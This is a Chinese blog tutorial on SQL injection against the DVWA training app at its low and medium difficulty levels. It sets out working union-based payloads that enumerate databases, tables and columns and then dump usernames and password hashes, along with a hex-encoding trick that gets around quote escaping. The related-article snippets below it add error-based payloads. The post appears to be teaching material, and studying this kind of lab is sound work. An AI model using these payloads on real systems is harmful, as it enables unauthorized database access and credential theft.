DVWA_SQL注入低中等级讲解

最新推荐文章于 2024-06-09 10:49:06 发布
最新推荐文章于 2024-06-09 10:49:06 发布
阅读量1k 收藏 12
点赞数 3
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Keiltest/article/details/126269629
版权

首先需要我们了解一下SQL注入的原理是什么:所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串.

SQL注入分为:数字型  字符型  报错注入  Boollean注入  时间盲注

再来了解一些基本的SQL查询语言: 创建库
create database db1;
创建库是否存在,不存在则创建
create database if not exists db1;
查看所有数据库
show databases;
查看某个数据库的定义信息 
show create database db1; 
修改数据库字符信息
alter database db1 character set utf8; 
删除数据库
drop database db1; 

之后开始操作

应该先判断是数字型注入还是字符型注入

输入1返回正确值

 我们再输入1'发现报错

 我们再输入1' and '1' ='1返回正确值

 由此我们可以发现他是字符型注入

我们在来判断字段数1' order by 1#

 再来1' order by 2# 以此类推直到报错就有几列

第3次报错说明只有两列

再来判断回显位置1' union select 1,2#

之后判断数据库1'union select 1,database()# 

 判断表名1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

判断字段名 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

 获取数据1' union select user,password from users # 

 low难度完成

把难度改为medium

其实medium就比low多了个抓包在bp中完成SQL注入就可以绕过防御

抓包后判断注入

 修改ID为1 or 1=1 #

 成功返回

 判断为数字型注入

之后与low相同在bp中就可以绕过防御

只有获取字段名时单引号被转义变成\'

可以用16进制绕过1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #,

Keiltest
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DVWA-SQL注入
WY92139010的博客
05-03 946
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入分...
命令注入讲解ppt.pptx
08-10
命令注入讲解 命令注入是一种高危漏洞,指攻击者能够控制外部的参数达到随意执行系统命令的结果。命令执行漏洞不仅存在于 B/S 架构中,也存在于 C/S 架构中。本次讨论的都是 Web 中的命令执行漏洞。 命令注入攻击...
DVWASQL注入LOW与Medium
ANDTM的博客
04-10 789
这里我们重点看前几行代码,大概意思就是当我们呈递的东西不为空是,就会把我们呈递的东西赋值给id(代码中蓝色的),此时右边的id(代码中红色的,即加引号的)就是我们输入的东西,没有任何的过滤机制。而在数据库执行时,如select email from member where id=$id,其中 $id 为 我们输入的值 ,如果 输入 1 or 1=1 ,则变成select email from member where id=1 or 1=1 ,SQL注入大概就是这个原理。
dvwa SQl注入中级、高级(使用sqlmap渗透)
最新发布
m0_72904009的博客
06-09 694
dvwa SQl注入中级、高级(使用sqlmap渗透)
DVWASQL注入低中高级)
qq_43455259的博客
01-20 4784
dvwasql注入
DVWA (Dam Vulnerable Web Application)中级SQL注入实战
baidu_33260220的博客
11-07 4678
1、输入’ or 1=1 #  ,发现’被转义成\’    ‘ “  \ 都被转义加\ 2、输入1 or 1=1 #  ,发现有数字型注入  3、输入1 order by 2判断有两个字段,输入1 union select 1,2 #判断两个字段都可以代入参数进行查询     4、输入1 union select user(),datab
DVWA靶场-中级难度
ljlrookiebird的博客
07-31 1029
网络安全 - DVWA靶场
DVWA Installation
08-15
它包含了各种常见Web应用漏洞,如SQL注入、跨站脚本(XSS)、文件包含漏洞等,是安全专业人士进行渗透测试和学习Web安全的实践平台。 在开始安装过程之前,你需要确保你的系统满足以下基本要求: 1. **操作系统**:...
网络安全原理与应用:SQL工具注入.pptx
05-16
实际应用中,如DVWA(Damn Vulnerable Web Application)平台的安全实验,可以模拟SQL注入环境进行实战练习。首先,将DVWA的安全级别设置为Low,然后在SQL Injection模块中尝试注入,获取URL,并使用SQLMap进行测试...
SQL盲注medium.pdf
05-13
知识点:DVWA Security平台的使用、Web应用安全测试环境、SQL注入测试。 二、SQL盲注的基本概念 SQL盲注是一种类型的SQL注入攻击,攻击者可以通过构造特殊的输入来获取数据库的敏感信息,而不需要知道数据库的结构...
DVWA下的SQL注入
07-25
SQL
DVWA-1.9 SQL盲注(SQL Injection Blind)
kirito_pio的博客
07-01 362
SQL盲注和SQL注入的区别是盲注只返回布尔值,不能看见详细的数据,要试出所需要的结果。 SQL手动注入盲注的方法包括基于布尔的盲注和基于时间的盲注;SQL自动注入可以使用sqlmap进行注入。基于布尔的盲注是指通过返回值来判断所得到的结果是否正确,不断缩小错误的范围来试出正确的结果;基于时间的盲注是指设置sleep()函数,看查询时有没有延迟来判断是否得到了正确的结果。 1、low级别 1.1 手动盲注 可以参考https://blog.csdn.net/kirito_pio/article/de
kali下在dvwa使用BP进行low等级暴力破解
weixin_45775145的博客
03-18 6004
暴力破解 一、 实验目的 通过该实验熟悉爆破的原理和Burp Suite的使用。 二、 实验背景 1、DVWA(Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 其主要目标是成为一个帮助安全专业人员,以测试他们的技能和工具,在法律环境允许下,帮助Web开发人员更好地理解保护Web应用程序和援帮助教师/学生教/学在教室环境的Web测试应用程序安...
DVWA-SQL注入(全级别)
小纯的博客
02-08 6343
一、SQL注入概念 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 ...
DVWA------SQL Injection (Blind)(SQL盲注)
m0_65712192的博客
12-09 2744
DVWA------SQL Injection (Blind)(SQL盲注)
DVWAsql注入——联合注入和报错注入
Williamanddog的博客
12-20 1858
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的中符合string 的字符串替换为value的值。
SQL注入中级篇)盲注
weixin_41472455的博客
05-12 789
盲注: 其实对于初学SQL注入,并不需要区分注入类型。 想要学好一种漏洞最重要的是理解漏洞的原理,也就是漏洞源码, 测试漏洞链接:http://45.32.81.200:8080/vul/sqli/sqli_blind_b.php 当输入 kobe 后, -------------------------------------------------------------- -----------------------------------------------------..
SQL注入(Medium级别 和high)
weixin_64066158的博客
04-26 986
和前天的low级别注入一样,我们可以先打开源码进行理解和分析 可以看出加入了特殊函数来过滤特殊字符,且变量的单引号不见了,可以分析出有可能为数字型注入; 打开dvwa,可以看到无法输入sql语句进行注入;这时我们要用到Burp suite进行拦截包和sql注入;从而得到我们想要的数据, 此时打开burp suite ,进行拦截并且send to repeater,用repeater进行sql注入和运行 ; 打开repeater 可以看出运行界面和运行界面的源代码(源代码在raw中,我
dvwa sql注入攻击流程
08-18
DVWA(Damn Vulnerable Web Application)是一个用于学习和实践网络应用安全的漏洞环境。下面是一个简单的DVWA中的SQL注入攻击流程: 1. 打开DVWA:在浏览器中输入DVWA的地址,并登录到应用程序。 2. 设置安全级别:在DVWA中,有不同的安全级别可供选择。初始安全级别设置为低,你可以通过点击页面上的"DVWA Security"来更改安全级别。 3. 选择目标:在DVWA的主页中,选择"SQL Injection"选项。 4. 探测注入点:在输入框中输入一个单引号('),并观察页面的响应。如果页面显示了SQL错误信息,那么该输入点很可能是一个注入点。 5. 获取数据库版本:使用注入点来获取数据库的版本信息。尝试使用不同的SQL语句,如"1' OR 1=1--"或"1' UNION SELECT @@version--"来获取版本信息。 6. 获取数据库表名:通过使用UNION SELECT语句和ORDER BY子句来获取数据库中的表名。例如,使用语句"1' UNION SELECT table_name FROM information_schema.tables--"来获取表名。 7. 获取表数据:通过使用SELECT语句和FROM子句来获取特定表的数据。使用语句"1' UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'table_name'--"来获取表的列名。然后,使用语句"1' UNION SELECT column1, column2 FROM table_name--"来获取表的具体数据。 请注意,这只是一个简单的DVWASQL注入攻击的流程示例。在实际情况中,攻击者可能需要进行更多的尝试和调整来成功地执行SQL注入攻击。同时,强烈建议仅在合法授权和控制下使用这些技术,以遵守法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值